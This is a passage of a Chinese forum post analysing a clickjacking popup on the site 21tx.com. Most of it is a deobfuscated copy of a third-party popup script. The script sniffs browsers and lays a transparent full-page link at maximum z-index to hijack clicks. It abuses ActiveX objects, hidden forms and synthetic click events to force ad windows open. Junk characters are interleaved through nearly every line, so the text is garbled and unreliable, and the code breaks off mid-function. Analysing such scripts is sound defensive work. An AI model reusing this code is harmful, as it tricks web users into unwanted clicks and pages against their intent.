天星网ClickJacking点击劫持分析
9 E, j+ B$ I2 L, r& T$ Ghttp://www.21tx.com/ 天星网 + ^( J% f, e" w; L& n* V6 V [ U
我得联系联系作者
. A6 w: `/ C5 g% \1 s7 s刚好打开这个站,发现第一次点击会弹窗,然后就不会,清除下COOKIE,又继续了,然后查看源代码,也没什么奇葩的。
" p4 Z# r( N# q9 ^1 P' d qhttp://www.lxting.com/script/popup/v1_min.js
W5 t$ o2 d9 m( W& `9 F: k
$ E3 H9 T) b# B这个是锁定到底JS脚本,
# [4 D5 B, n2 O" \解密后的代码- (function() {
) S& i6 L; X4 _4 s: `7 s" v0 o - var aa_url = window.ytpp_url;
" ?$ g% z7 C( w- e# I$ x( S - var ua = navigator.userAgent; - L5 A* _( K4 u, }4 E
- var form_div = document.createElement('div');
0 B/ R' }0 f4 _- q# E9 w - var form_pd = 0; / D; U! I, t, ^/ q9 `0 @: ?$ P
- var browser = { % V& o1 I+ i& d- q" t4 M
- ie: /msie/i.test(ua),
! R, l/ l1 m; l. _. Y/ z - ie6: /msie 6/i.test(ua), # m! T8 B# b" W/ c
- ie7: /msie 7/i.test(ua), % e2 n) @( a! [" I1 U
- ie8: /msie 8/i.test(ua),
9 g# T8 t+ f# o; M - ie9: /msie 9/i.test(ua), ) R8 ]" a# b; _( ?- m( {
- 360 : /360se/i.test(ua),
* y/ w! Z* a2 r" K s0 R" W - sogou: /;?se.+?MetaSr/i.test(ua),
7 H, _" J, t1 \* y7 N6 W - maxthon: /Maxthon/i.test(ua),
2 u T& [ _& I- P' X, x; g - tt: /TencentTraveler/i.test(ua),
" W9 Q- ^ T! p! H0 E4 b7 t - ff: /firefox/i.test(ua), , O8 F, [' x/ R: `
- webkit: /AppleWebKit/i.test(ua),
2 H' b; n9 f8 u1 T) M - opera: /Opera/i.test(ua), 1 [ ^7 d8 P$ ^! @% A
- qqbrowser: /QQBrowser/i.test(ua),
" G1 C0 w) b) J# G; O8 j1 \% g& H - cr: /chrome/i.test(ua), 8 p/ [3 O6 w1 `4 a5 H" L B
- gg: window.chrome, 5 p& S3 e5 |% l3 B+ i3 A8 C/ l
- theworld: /Theworld/i.test(ua) ! L) z. u7 p0 S! o; q
- };
/ g0 Y( [* V) E( F - var _setting = ""; $ F( r9 c, i9 v, s
- var _ct = 0;
6 q0 f; O% r8 w' L - var _le = 0; % @: A+ Q8 W- G8 l _
- var _pd = 1; + y/ W0 E* F& k5 W( H
- var _pd2 = 0; / q' G! a; R2 y3 n0 v$ N* h/ ?
- var _pc = 1; ; d4 c `1 N q0 K( V) @
- var _pc2 = 1;
9 \, U9 x8 n2 g& h. D - var _pco = 0;
1 M! v# W4 Y# p3 F4 v - var _pta = 0; 4 r4 c# A# P: N- v7 T
- var _ptb = 0; 2 L) t4 P# W0 F' ?% z
- var _pt2a = 0; 8 S" e+ o( U2 q9 p0 `
- var _pt2b = 0;
, d& g$ ^- L; ~9 J - var _pt3a = 0; / V# |& y1 Q5 @
- var _pt3b = 0; 1 h6 R* R7 m" X( m
- var _pt4a = 0; " I/ r; P. M* j* T
- var _pt4b = 0;
1 G5 K. d w7 j+ x- E1 b2 m9 e - var _pt5a = 0; 3 j% K& t1 k- Y" R* k
- var _pt5b = 0;
( R% M( V. E( `' a+ Z( A | - var _pt6a = 0;
3 F2 l t9 t( y - var _pt6b = 0; / y q) o2 N9 ~" S0 G
- var _pt7a = 0;
5 G" j1 q0 N7 Z- g: g6 y) b2 c - var _pt7b = 0;
1 |0 N1 l* j- T7 g5 K4 k. s& t - var _pt8a = 0; $ v' m( M5 A+ ~# e0 ]( P- o/ m
- var _pt8b = 0;
2 p! |0 j7 o4 a3 X2 a - var _pt9a = 0;
7 b& V0 ~8 B3 `7 n. \. m& a - var _pt9b = 0; 4 U" Y5 ~% ?; p R {+ T
- var _pt10a = 0; * Y0 q2 `8 ]8 K# C- o' P3 T5 q
- var _pt10b = 0;
5 o5 ?1 C$ m1 Z4 {+ a* D& y - var _po = 0; & a; G5 Z' W: N8 T/ O
- var _poo = 0; : p4 ]0 s8 g7 Z6 ?1 l5 U2 Y, ]! e" Z
- var ckn, ckt; $ b/ b; e8 B0 C% j3 l
- var ads = 0; ' W6 C, J- E! {" q0 A( j0 M4 ?+ G/ ^
- function b(w) { 6 o. u1 B0 ]) {/ ~8 e# a
- var s = w + "="; ! T3 B4 P! B( P# w
- var r = ""; 2 z6 Q0 d. K% Q; Q# R0 h
- var o = 0;
# ?2 V; \" I K' j7 \ - var d = 0; + v! d6 f! J. k. }* q8 V6 ^
- var p = document.cookie;
9 v5 H4 `: j4 r - if (document.cookie.length > 0) {
$ x* U$ O2 k- } - o = document.cookie.indexOf(s);
0 C/ n% ?% ]' e( X. ~, H' h& o) B - if (o != -1) { : N" H1 C7 {& G* x) y
- o += s.length;
" r, v) |7 B/ B7 T' r* a - d = document.cookie.indexOf(";", o); ! B5 |0 ]: V5 X9 j
- if (d == -1) d = document.cookie.length; % m4 Y/ `7 w- P1 O
- r = unescape(document.cookie.substring(o, d))
7 w, m/ p2 s( K$ O9 [ - }
0 T0 Y. b: j' }+ I! n5 N - } ' b# L6 N. Z" V* B
- return r
8 |1 c6 f( P3 @0 Q5 Q3 G: I - }; t4 E# b4 U/ \! j+ B2 }
- function p(w, p, v) { 4 T5 F9 D3 l% e2 {8 X# p
- var t = 30; - @- E3 u# b" v: |% u/ V' O
- try {
J( @% f2 ]4 ^: T; t( s - t = parseFloat(p) * 1 ' C/ W: P; ?# n
- } catch(e) { ! G- d# X! t, Y
- t = 30
9 q* r9 S5 {2 j, X- r - }
+ v! |/ r% \& m( l0 X: N/ H$ j - if (isNaN(t)) t = 30;
' [+ N" }- e6 V5 ? - var then = new Date();
8 e% t1 B) c6 `$ x! v1 I; O- ^ - then.setTime(then.getTime() + t * 60 * 1000);
2 i% H, y- z) a: F: j I$ L - document.cookie = w + '=' + v + ';expires=' + then.toGMTString() + ';path=/;'9 r9 V0 g. b$ Y! C
- }; % ~' ~; X F( v6 `8 W7 u# F
- function init() {
. H1 \6 G. D: d - _setting = ytpp_sti; + ]' o% w" ~& w$ K
- if (getp(_setting, "CT")) {
r& _ k( z1 |4 r1 X - _ct = getp(_setting, "CT") / n) T! y( J3 j8 x
- }
7 E+ \! S% T, s F8 w- b1 o* w$ [ - if (getp(_setting, "LE")) { 2 [9 ]6 @2 H3 {9 v* L
- _le = getp(_setting, "LE")
2 _; V/ \! u" ]8 r3 G6 K - } - i# x8 ]: t/ Q/ C+ J$ X: n; g+ h
- if (getp(_setting, "PD2")) {
* f/ C/ w1 {$ H6 ~( ]/ z - _pd2 = getp(_setting, "PD2") 8 L- L' i) S# m4 d: }
- } E' \, i, ?7 K) ?+ m4 I4 d! D
- if (getp(_setting, "PC2")) {
& r! j( H5 l/ Y1 h: U Z - _pc2 = getp(_setting, "PC2")
. [9 F. z1 E6 }% u - } 2 Z( a* t% h" D4 L+ f% c+ C
- if (getp(_setting, "PCO")) { / L8 ^3 i8 a; N( t0 A0 X
- _pco = getp(_setting, "PCO")
9 R* S( W/ r$ h8 k - } ( ~- L& [" e( _
- for (var i = 1; i <= 10; i++) {
: |8 ?4 @. B$ V) T7 ?! E8 J4 S0 z7 d - var n = i == 1 ? "": i;
! _6 l( o5 T& H- D3 K - if (getp(_setting, "PT" + n)) { : r# x" R! f* _: Q8 j' b
- eval("var _pt" + n + " = getp(_setting, 'PT" + n + "').split(',');"); 0 e! z7 o- z1 T/ a) ]4 h) g
- eval("_pt" + n + "a = _pt" + n + "[0];");
' N x% r2 L! J! l) \' P - eval("_pt" + n + "b = _pt" + n + "[1];") 2 v, |# J, S+ s" W* W5 O* y
- }
8 q$ ?7 O2 E+ A* U% h6 v - }
$ O# t& d* i# E x9 z* d' G - if (getp(_setting, "PO")) { 0 e2 f: V- k4 w& ? J
- _po = getp(_setting, "PO")
# M3 R) S; L* x4 L4 \4 o6 Y8 v - } ' i9 W k( ?# A: X, _( M% H
- if (getp(_setting, "POO")) {
q8 \& {( ~' _0 Z - _poo = getp(_setting, "POO")
# q" _2 Q* _/ ^0 a - }
0 h$ M; _. C& J5 p8 l - if (_pco == 1 || _poo == 1) { ; p- P# g" S$ D/ s. s/ j: R
- if (_poo == 1) {
- q; j0 ~4 r& o/ u7 a; `! O - _pco = 0
, c7 t6 v' k$ P1 h) ] }/ E& K& Z! B - } else {
8 H2 y. u* o; {8 B L - _poo = 0
) g# Y5 o/ s& u6 N& f - } 5 r/ l' N" p0 J; c7 Q1 z' `# w
- _pd = _pd2 = _pc = _pc2 = _po = _pta = _ptb = 0;
# R) |. ^5 A( o) c! ? - for (var i = 2; i <= 10; i++) { - }7 o( K7 g, o2 _& [# o- r
- eval("_pt" + i + "a = _pt" + i + "b = 0;") ; l$ w: H4 w4 W6 i6 _9 B
- } 6 o& `6 Z# p7 s0 e- g
- }
" z" J- y1 r: V/ ~7 { - };
% D; f. D8 z8 W- K+ l7 G' E - function getp(s, p) { ' r H6 n# j! @; x
- var i = s.indexOf(p + ":");
* e" J0 r% n; } Q) \: H9 @ - if (i >= 0) {
/ K: G9 ~; p. c6 |2 c8 Y - return s.substr(i + p.length + 1, s.substr(i).indexOf(";") - p.length - 1)
! l) H) ~- D! R# @ n1 S$ s U - }
" Y2 o- @9 K0 i/ X7 `4 O - };
& a+ d3 T4 J7 u3 h2 _# }4 m - function event(e, event, func, act) { ) @7 j& U' p) s [# t
- if (browser.ie) e[act === undefined ? 'attachEvent': 'detachEvent']('on' + event, func); % b% b: y! N! @3 B9 [
- else e[act === undefined ? 'addEventListener': 'removeEventListener'](event, func, false) + \( ~5 y' C0 ^# W0 x
- } 0 T' }" v4 ?( p( a' ^3 j& ^
- function pop(url, param) {
0 k: J4 k# N* t2 o2 f - if (!document.body) { / A7 M* F Y* Q2 e7 g1 {4 ^
- return setTimeout(function() { 2 _* q% ~: y7 O3 P$ |
- pop(url, param) 6 _3 I) l* }% H
- }, ( o; o5 e0 X) l8 w
- 13) $ t: D: }, h- a3 X3 s$ d
- }
9 J5 `: _! y8 V7 ]) F4 i - try {
; {+ \0 Y; ]1 f1 d - if (browser['cr'] && browser['gg']) { " p% m/ F8 s! g0 c0 ~9 ]2 D
- try { 8 _5 n& A2 K9 w8 D' g! D& I* y8 @
- hrefopen(url)
g$ u/ K! D# X - } catch(e) { + f7 d* X, g" r- ^
- a_pop(url)
2 p1 u' w& \0 N# A) M - } & \# K* D s0 d) u% G
- } else if (browser['webkit'] && browser['maxthon']) { 3 F' F- `/ H# x" |3 f
- if (!func(url)) {
0 A6 z- w% C$ I: X# F. D - try { ' U/ B3 V4 H1 ^7 A5 s- a
- form_pop(url);
8 w- w. S- r0 r" s/ E - a_pop(url) 0 U8 }/ z3 p4 \5 V8 ?) A5 F' }
- } catch(e) {} 6 z/ M, g+ m' }
- }
7 h* X7 i8 e/ N9 z1 H4 U - } else if (browser['tt']) { / @/ K" r/ `3 E
- try {
/ q( [8 u) e* [# E/ u2 G) ~% G% c+ P. X - object_pop(url) & ~! K; r* t& T) T% c
- } catch(e) {
" s9 ^/ f+ D1 g C" o$ w - a_pop(url) " B. C$ s! }$ w l4 {
- } 6 n e& X- O, G1 |( i4 b
- } else if (browser['sogou']) {
8 ?0 j) N# V$ f" y - if (!func(url)) {
4 E1 O, z! F; k8 G2 B+ v5 ^) x - try {
2 B/ e4 ]. E' v% d# I - a_pop(url)
. i; u: p, j3 J6 o' O- e( ], l& l - } catch(e) {}
3 b: E9 `8 ]' ^6 F - } @, r; F0 l* o: v* X) G
- } else if (browser['webkit'] && browser['qqbrowser']) { 5 M4 \- S+ g; K$ I4 l
- if (!func(url)) { + m& u* m. g# z- I5 c- _) T
- try { # O5 H/ K+ c7 I$ ^/ @
- form_pop(url)
1 m: R" Y" c, Z- C I6 v& ], s - } catch(e) {
2 ?( Y% w- e- _ b( J3 r, ` - click_pop(url) 2 f& m5 D: f( g& \+ d+ P
- } " A- I# {/ c7 g7 L) n6 R
- }
* w* H, r8 R; z# ` - } else if (browser['webkit'] || browser['opera']) { " o3 r" b! v9 J# `# `
- try { 0 b4 J8 s4 ]8 U" O! P
- form_pop(url); : Z1 S$ {- X" L# w3 z- N
- a_pop(url) 7 C( @+ h& v7 q! Z! g
- } catch(e) {}
' q5 Q9 q. o1 m7 N7 ^* D - } else if (browser['theworld'] && browser.ie6) { ) v% n) x5 \, s, Z( D6 N
- if (!object_pop2(url)) {
% k, p& D) u) r8 h; q/ t2 W3 r - a_pop(url) - o0 T' `5 A2 ]. ~
- } & `9 @5 t8 a6 D0 d. l+ G/ z; b
- } else if (browser['theworld'] && browser.ie8) { : I$ ~) f, q/ k: a& a2 ^
- if (!func(url)) { & O+ F4 w; f3 @) [1 A$ X! _% N
- try {
6 t- V4 D2 ] y" T- L1 C - object_pop(url)
, q' T* d/ Z' H$ ] - } catch(e) { ' }8 L( L, \ ~% Q5 {3 A# T; B8 O' N" D$ J
- click_pop(url)
. r0 r$ A- n* p H- f - }
9 E& o, w' A: N- e; r - }
" w- ~' b+ }( _" m }, J! r7 U - } else if (browser.ie6) {
% \; T0 f% @6 ~7 t - if (!func(url)) {
5 q) K L0 j) D+ x - object_pop2(url) 2 ]3 R& v- ~& i: C d" e4 ~% N
- } . b9 W* E0 W E ]" Z8 A0 g0 k& K
- } else if (browser.ie8) {
, C ?3 X( A: a - if (!func(url)) { 3 d* G: y7 D, u! i7 M! D% R1 Z! [
- try {
5 K# G6 a, T0 p. f2 q6 D* Y+ ~ - object_pop(url)
5 B' | I. Z& E6 ?3 m1 @ n9 B" ]1 n - } catch(e) {
# O4 X6 s: _& h* Y( J - document.onclick = function() {
# j% `: ^* Y @( r# N9 \, t - func(url);
- ^# S% @; |% \' s - document.onclick = null; Y$ y6 h% ?& E6 Y& D
- } & D$ w' J8 |: d
- } 3 @ m: k. b- N* ~
- } * Q2 W$ U0 ~$ v. V! |1 k n% ]
- } else if (browser['ie']) { # D' Z1 A2 {* \3 d
- try {
3 w& a6 X+ J( B2 p5 J# l0 \1 M; ]/ { - object_pop(url)
% q3 j, j( P- `% s% n# o8 i" D- n - } catch(e) {
" ~: `, m$ a/ f! H& d+ L/ J - click_pop(url) ! b1 Q. c; b4 _ G2 u
- } 2 q# s" c! T3 @- Y
- } else if (browser['ff']) {
% m' l( ?5 a3 T2 \- ?9 l0 }$ p - if (!func(url)) {
% X& c5 _! V1 y; B3 {4 j8 Q - click_pop(url) 6 c1 }! m; f0 N0 E& Q2 Z
- }
0 S0 j3 j# w& e - } else {
% _4 L9 C% N) s- U2 _0 Y" G+ S - if (!func(url)) {
! y, I- Q$ [, k C( r9 q2 S - click_pop(url) 1 G4 T( a! U i
- } & n, e0 I" I# q
- } : ?# r! p( u+ Z( {" @1 Y) B
- } catch(e) {
# L V" J; q, s, S. B - if (browser.ie7 || browser.ie8 || browser.ie9 || browser['qqbrowser']) { % W- I2 k2 [! h! `$ T6 i5 f
- click_pop(url) : ~0 `1 _5 m: ?5 _3 ~6 W! i
- } else { + v* i! J7 j+ t
- a_pop(url)
8 R' X3 R6 |: e9 P( d - } / G7 J2 n) k4 g0 [6 B
- } - y1 f" V5 ^: W8 a$ o" @
- } # _' z$ W3 J$ N
- function object_pop(url, param) {
' H' A9 D( d0 [& [9 R8 o3 z( a - var object = document.createElement('object'); * g4 d& X" g: i
- object.setAttribute('classid', 'CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6'); ( x. }+ V! E0 Q" Y# i0 N
- object.style.cssText = 'position:absolute;left:1px;top:1px;width:1px;height:1px;'; & A4 n% i; E$ O0 {# ]( S
- append(object); $ {: z! M6 ?; _: y9 f$ N
- object.launchURL(url); ' Y9 K: W0 r2 Z3 [
- ads++; ' }2 j0 E* I' S0 j& a8 J
- p(ckn, ckt, ads) # H1 m0 v( `; n4 O6 u8 U
- } # j5 C' O4 J. f3 _
- function object_pop2(url, param) { " n8 ^ i6 e/ S
- var object2 = document.createElement('object'); 2 M- y u8 x3 e0 T% n( S& I
- object2.setAttribute('classid', 'clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A'); ( e7 p7 }4 h; o) U2 t. l' Q( L
- object2.style.cssText = 'position:absolute;left:1px;top:1px;width:1px;height:1px;'; , U0 A8 n- Y7 Z
- append(object2);
7 m( G' S/ ^( ]* r4 ?9 q( r% m - for (var i in object2) { 1 Y8 E7 p) y7 X% b) \& {2 }
- try { (function(o) {})(object2[i])
! C4 e' j" @4 C& q - } catch(e) {}
( `: y( U0 z3 b6 O - }
7 B( D$ |4 R+ X! i - setTimeout(function() {
* J+ }2 P" g# | - object2.DOM.Script.open(url, '_blank', '')
* O m. V' O' ]; e3 u - },
( U1 p a) W9 E0 H0 }/ g1 C) f3 S; C - 500);
' \ O! ?- I. @# G) z# I - ads++; ( k$ h6 D' M0 u) s. Z
- p(ckn, ckt, ads) a4 B$ e2 y0 m8 I2 i
- }
" \% V; B. B% v0 W( | - function append(e) { ( b, t3 @- |4 M& B. h/ m$ z
- for (var t in {
7 I! W8 R& n# f! W& \% A - body: 1 , u, m0 k3 ^) ?7 V
- }) { + U( ]9 W5 b) X6 \; N8 u
- var ele = document.getElementsByTagName(t); ) { a4 ^5 o3 F
- for (var i = 0; i < ele.length; i++) {
' h7 Q$ b3 e9 e0 }. S' Q% Y9 ~ - ele[i].insertBefore(e, ele[i].firstChild); 3 r) i& r4 ]% t- d
- return6 Q7 i) V4 X6 M
- } . E% L- o5 h; _0 Y* E. D
- } - c8 y: K* Q, Y7 f# N& X
- } 0 r) G+ Q. m, M) S$ Z' @( ?
- function hrefopen(url) { # ~/ W! F& x; p9 T% Z6 h
- try {
$ T1 Y6 E8 @7 q/ Q* e, F - var c = document.createElement("a");
. Q3 N6 `, b$ H - c.setAttribute("href", url); . A: l! O' _( d2 x+ b# d0 B7 z; ?5 @4 B
- c.setAttribute("target", "_blank");
o8 A( V3 K* j1 z4 U' q4 R/ i7 I5 t - c.setAttribute("style", "display:none;"); ; E$ [+ i, J* Q
- var b = document.createEvent("MouseEvents");
- P5 @" ^, ]/ j3 b. D - b.initMouseEvent("click", false, false, window, 0, 0, 0, 0, 0, true, false, false, false, 0, null);
9 `1 P8 z/ s: ` c. i& l6 n: w - c.dispatchEvent(b);
0 H, s* z9 }3 d' c3 {; r( v - ads++;
) E+ u4 H/ G% | a - p(ckn, ckt, ads);
. i0 F! R+ a8 o1 e: F$ M3 o2 w9 p - return true M0 T/ x7 D" `5 Y
- } catch(q) { 0 T3 G( U4 u( x; P
- return false2 A5 ]! Q# T1 b! W: [( n& ~. ^. |/ a
- } : {$ V) E2 m0 H1 K/ e
- } 8 P$ S) T: Q. M
- function form_pop(url) {
; e4 f5 Q% o9 J% \& e - form_div.setAttribute('id', '__unionsky_push_d_object_box__');
]. ~! C, X4 q, I4 x* n3 D- \, l - form_div.setAttribute('style', 'display:none');
# n$ u6 f0 }; u" N$ g$ Q - var form = document.createElement('form'); % t3 P' i8 ?& _ \- |
- form.setAttribute('action', aa_url);
+ }" f! _# |1 R2 n' \: S U2 H - form.setAttribute('method', 'post'); * E* D! s# _) @) ^
- form.setAttribute('name', '__unionsky_push_d_form_box__'); ( P9 N: D7 ~- M% @8 a
- form.setAttribute('target', '_blank'); 7 [# D; f7 } i- ~
- form.setAttribute('style', 'display:none');
8 [8 q- m* v( B' z( u8 T - var sinput = document.createElement('input'); / S' b8 K" s/ [) d2 V: T7 y
- sinput.setAttribute('style', 'display:none');
( I8 ?6 l" a- [/ C& d - sinput.setAttribute('type', 'submit'); 4 `, T2 }+ d- u' M. \4 x' P; Y$ h
- sinput.setAttribute('id', '_sumit_2app');
1 b) h9 I5 p; z/ ?6 x% O$ S - form.appendChild(sinput);
/ _8 g% _( W7 _6 \$ d - form_div.appendChild(form); 7 R" G8 D) j) F3 U
- append(form_div);
5 B! G8 ~2 l: g - var unionsky_from = document.forms["__unionsky_push_d_form_box__"];
. x i* f# F5 }; ` - try {
& J" q, r0 R( l) b - document.getElementById("_sumit_2app").click() * d8 K0 n4 R0 F, R. N6 \* Y) L
- } catch(e) {
. S4 ]. e' ^: j' m% { - event(document, 'keyup', 6 E. O2 d. S1 Y* j# T1 O0 V' {+ r
- function(e) { 9 K, u4 i3 X7 ]" @
- if (document.getElementById('__unionsky_push_d_object_box__') == null) {
b( X6 M2 I$ t5 y0 H# c% L& O1 r; n - return1 Q( {' C+ v" | O* E' |5 c
- };
! P* @! B/ o N2 M - e = e || window.event;
3 i4 O5 o4 {/ O2 q1 \9 j - e.canceBubble = true;
9 f4 I# z* m! O - event(document, 'keyup', arguments.callee, true); 7 U8 z' _0 z8 b; ` P- g0 d
- form_pd = 1;
6 v/ R2 }2 B3 l, i - unionsky_from.submit() 2 P8 p9 K, {/ h# t& }1 ~" [
- })
5 U' T# g; Y7 I, [3 E$ t# W - } 3 y0 G3 c- H" e& s9 e! i1 |6 Y5 Q
- }; + q1 C3 I* t; H4 Z/ m) y
- function click_pop(url, param) {
* a& k3 |0 S- _! \ - event(document, 'mouseup',
) C. E0 l+ c1 E+ n( m0 e - function(e) {
5 h3 ?0 N0 H9 `% ` - e = e || window.event;
( b N- H1 a* b/ W0 C! q* q6 D - e.canceBubble = true; 9 x2 x* k; H8 x% E7 z8 P2 w" D' ^( P4 i
- event(document, 'mouseup', arguments.callee, true); ( {* E- _& {( \1 u* m. x- T
- func(url, param);
8 x4 u* T; }. Y, ]. |' r2 U - ads++; & h% N) ~5 f9 D
- p(ckn, ckt, ads)
$ ~% w! u! k" S1 u/ h4 j# Y* }7 N+ A - })
5 l; k5 a; W+ N8 q3 P1 L- V - }; ; m( {/ R. z2 T
- function a_pop(url) {
- i3 R! V" M4 s/ F0 A P, `. n5 R: y - if (ytpp_plid == 166028) {
4 {: h! s9 j4 N$ ^( Q" Y% n - return G7 s0 R( x& R" f6 d/ b) c
- }
, P- F' d/ _4 y- _! u- {$ ~* ? - if (!document.body) {
7 T) C; A( y' [& E - return setTimeout(function() {
8 a* {" P7 e& Y3 f# Y2 s. o - a_pop(url)
f2 x* G! J/ x! g; ^. ^3 k4 T - }, 3 `( X8 U4 ?; k& J0 [, l+ l
- 13) # S% F- u. Q* X& g6 Z$ Y5 F
- } 3 ?+ R5 K) L& |) A
- var a = document.createElement("a");
4 b1 d! f0 S. g1 h% o8 Y - a.href = url; 0 ?: P$ ]4 j/ L
- a.target = "_blank";
7 x* l' [. r$ G2 x+ E+ m ` E - var div = document.createElement('div');
0 {# M3 g5 u" K7 {* @ - div.style.backgroundColor = '#fff'; ( N7 i$ g4 B! |; x$ P: O( d
- a.appendChild(div); 9 x/ ~7 V! ^( P, e7 ]( e
- append(a); ( O+ ~ g; A0 G0 {
- var as = a.style; " K) t7 z2 P/ ]0 T/ D
- as.position = "absolute"; ! [* Y) o, g. ]
- as.zIndex = '2147483647';
1 H, E& D4 ~5 E/ _# g$ t) l - as.display = "block"; - x1 n3 b5 b+ j( f* O% Q; N
- as.top = "0px";
W2 L [& `" `4 T! v2 ~ - as.left = "0px";
8 y4 a8 t0 |/ ^' i - as.cursor = 'default'; ; l* r. l6 S! z. ^# t8 ^
- as.opacity = "0"; 8 J( p& X8 n' K: C
- as.filter = "alpha(opacity:0)"; " q$ u- w x" b
- var m = setInterval(function() {
7 {# Z y: f" v q) l% [ x$ d - if (form_pd == 1) {
& N7 m5 p: R4 |( {! s, L - a.parentNode.removeChild(a);
0 {& z" f% i. D7 b% x3 t$ s - clearInterval(m); - t( M+ x' h3 N' z5 I E" I- }
- return
/ c7 ?# d7 {6 X9 L3 D' |1 Z' x - }
3 l. \1 ]8 K- q- m1 P& U- d - a.style.zIndex = '2147483647';
7 _5 }# h3 y& t - var d = (document.compatMode.toLowerCase() == 'css1compat') ? document.documentElement: document.body;
4 \% e& w3 L2 |& W - a.style.top = Math.max(document.documentElement.scrollTop, document.body.scrollTop) + 'px';
: s( x$ J' ^3 z) u/ ~% \ - div.style.width = Math.min(d.clientWidth, d.scrollWidth) + 'px';
' c3 j# n: Z- y" x) s4 H - div.style.height = d.clientHeight + 'px'; 0 J- q' `- g8 Q: r+ ]$ V0 W
- if (browser['ie']) {
`! e1 E. f' z+ Z0 \$ m - try { $ N9 O5 U2 P7 c
- var divs = document.body.childNodes; 5 `7 ?, B$ s( z' A) \
- for (var i = 0; i < divs.length; i++) { " s% i2 F4 K% h8 f" J
- if (!divs[i]['style']) {
$ C1 @: {& t3 l5 o) M, G. m' P - continue- p8 d5 N% F" {) Y
- }
) n$ x1 h* J0 u2 i- l2 T5 d6 _9 f - var _i = parseInt(divs[i].style.zIndex); 0 J6 R! S: [; ]9 f$ ~ E$ r7 S: e$ E! {. Q
- if (_i && divs[i] != a && _i == 2147483647) {
7 Z# K1 {" Z# s6 U0 } - divs[i].style.zIndex = _i - 1 & v7 j( V9 U% r, l9 y
- }
- x _9 ?" d7 i- n) X% R' R! u - } 0 n# E p( j1 O" Z% k5 a0 ?
- a.style.zIndex = '2147483647'
# C4 E* `* T7 {9 P# L - } catch(e) {} ' V# Z& z& w2 M ?# P. B# K" B
- }
/ m, d y" `1 h - },
7 Y& S5 }8 G$ o; ]/ a3 j C' a - 120);
. P3 {1 ?; w# b" M" z) G- C0 k. v - a.onclick = function(e) {
" O5 V% M' J w% j' f; V9 d" t2 J* Z - if (document.getElementById('__unionsky_push_d_object_box__') != null) { , `! D( f/ S( F! m7 A. f
- form_div.parentNode.removeChild(form_div) * \. }1 V3 E" M1 ^4 C+ U* H
- }
$ R* k6 P5 B0 l; I" w - e = e || window.event; 7 D! y( @! g9 g# }4 |
- e.cancelBubble = true; # u2 a0 u" o( M9 r
- setTimeout(function() { ! F+ M, r6 l# q/ w
- a.parentNode.removeChild(a) + C" ^$ H) l: y7 F( m# _2 r
- }, & r1 R6 H/ E2 F ]
- 200);
- B7 H" |% U3 B5 \2 K0 T - clearInterval(m);
8 H, X/ j* }! p$ l+ f - ads++;
$ F- i8 P! a0 d) b - p(ckn, ckt, ads)
, r4 g$ @ ?1 e+ W - };
, h6 O! v" r/ R) |8 O - event(a, 'mouseup',
. |5 G Z) n6 q. K. W9 o) @ - function(e) {
9 T: r3 E0 T' l* T O( k - e = e || window.event; $ Z% s. F! k D7 p+ ~5 W
- e.cancelBubble = true
* K/ j* f Y; i: j! q - })
! q: x/ u9 O9 z! c3 N - } : w, [ a0 t8 }5 p \; D
- function func(url, param) {
9 E$ _$ l( t* r - var f = window[String.fromCharCode(111, 112, 101, 110)];
+ g1 c* I Q/ l- i M( M, @) Y! }: c - var w = f(url, '_blank', 'left=0,top=0,toolbar=yes,location=yes,status=yes,menubar=yes,scrollbars=yes,resizable=yes,width=' + screen.width + ',height=' + screen.height); 1 R0 m" o+ [5 ^7 ? l: B; B( t/ C
- if (w) {
7 A2 t* c/ e% U8 b - ads++;
# K- H/ J( r- x$ v% P - p(ckn, ckt, ads) / H) H$ ^/ S4 k3 D9 D
- };
, c, V, v0 `- f" g+ r - return w
: X2 N1 o4 n5 W! N7 ^! J; w" X - }
7 [. j. t$ `6 P6 P8 J7 M - function fstart(url) {
% h" @) S7 V, n4 Z - init();
3 ^5 p$ s+ T9 Q& [" D9 A - if (_ct >= 0) {
+ Q* l0 k4 I& _9 m& M - ckn = "YITIAN_NUM"; ; Q/ B- Z% s3 c6 F
- ckt = _ct . M( \, a' r, F0 M9 d. S ^( u' P
- } else { , C: V( e9 b! p
- ckn = "YITIAN_ALL";
- H7 u3 |3 ]* l' Z7 z+ E - ckt = Math.abs(_ct)
' K2 h( ^8 B( V! P* y6 Z% G - } 1 O0 `9 I6 E- S% v b# f$ k# |
- if (ckt > 0) {
2 g. s$ \- A1 b# _% X; | - if (b(ckn)) { $ A. z, Q; I" u6 z2 [* {' z
- try {
7 \. k7 Z. t& ]$ y1 ` - ads = parseFloat(b(ckn))
/ W. O6 Y$ D, e) C - } catch(q) {} & i3 d, p: ~$ O8 H+ y7 v- k) R1 \
- } / @: k/ h9 X5 ~+ o Y( e0 z
- } 6 I2 H% R) H: _7 G0 p
- if ((ads > 0 && ckn == 'YITIAN_ALL') || ads >= ytpp_ads) { 1 Q5 [) c& b# `3 f E6 q
- return
f1 }+ A/ k! s+ x/ r9 h - } else {
2 e. U9 y* v5 ^# A5 Q, G - if (_le > 0) { . n# _( y+ P; S% [( z
- setTimeout(go(url), _le * 1000)
0 P/ b8 J w* T' ?" u2 _+ D - } else {
& E) m \- p5 [ - go(url) 0 s' |% N6 l* m g
- }
3 m v; e- f5 O- f3 |3 B* H - } & d9 T- w8 F; z& b- |. M. K
- }
+ I; b# I- l* c$ |8 L/ Q2 Q - function go(url) {
1 ~2 V- ` Q: `% }" c - if (_poo == 1) {
3 p. l( Q: s6 P( X% v( Y - try {
( G* d1 Z8 j5 E- m& _: B& e - func(url) - F' r }, ] F5 t* D9 L
- } catch(q) {}
& t P" Y8 J8 D. d# {! r1 S - } else if (_pco == 1) { ' Y: S9 K5 p' a9 A
- a_pop(url)
/ x8 A& z* Q! e! K. T/ M9 m9 j - } else { " H% F$ B, j/ y4 u$ M9 k
- if (_pd == 1) {
* @" q/ [( J* k/ }( q, } - setTimeout(function() {
! y, [7 ?. o4 U) B% s& }# J* q9 a - pop(url, {
3 |5 W- a" m( I4 r) W4 ` - a: 1, 6 ?& J* V4 z) F, L
- b: 2 8 _- d/ v, W+ F4 Z% P/ c# S
- }) $ @& t! A7 _) \" W% S' f( B
- }, $ J7 h$ X, m: h) s) R: Q: s
- 300)
0 o+ ]6 i8 r# S) M/ H6 j# u - } / F) i/ j3 @. J0 Q; D" C7 W
- if (_pd2 > Math.random()) { 0 t7 e5 u$ c1 i8 C0 q' l% M% y/ j
- setTimeout(function() {
! j- S% x9 |+ N - pop(url, {
